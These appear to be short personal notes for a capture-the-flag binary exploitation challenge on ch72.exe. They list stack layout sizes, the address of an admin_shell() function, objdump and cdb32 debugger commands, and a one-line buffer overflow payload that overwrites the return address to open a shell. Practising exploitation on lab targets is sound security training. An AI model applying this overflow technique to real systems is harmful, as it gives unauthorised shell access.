buff size = 16
i size = 4
ebp size = 4
admin_shell() addr = 0x00401000

Disassemble & get addresses :
objdump -d ch72.exe

Debug :
cdb32 -p <PID>

CDB Help :
dd addr : view mem
bp addr : set breakpoint
g : continue
p : step over

(printf "AAAAAAAAAAAAAAAABBBBCCCC\x00\x10\x40\x00"; cat -) | ./wrapper.sh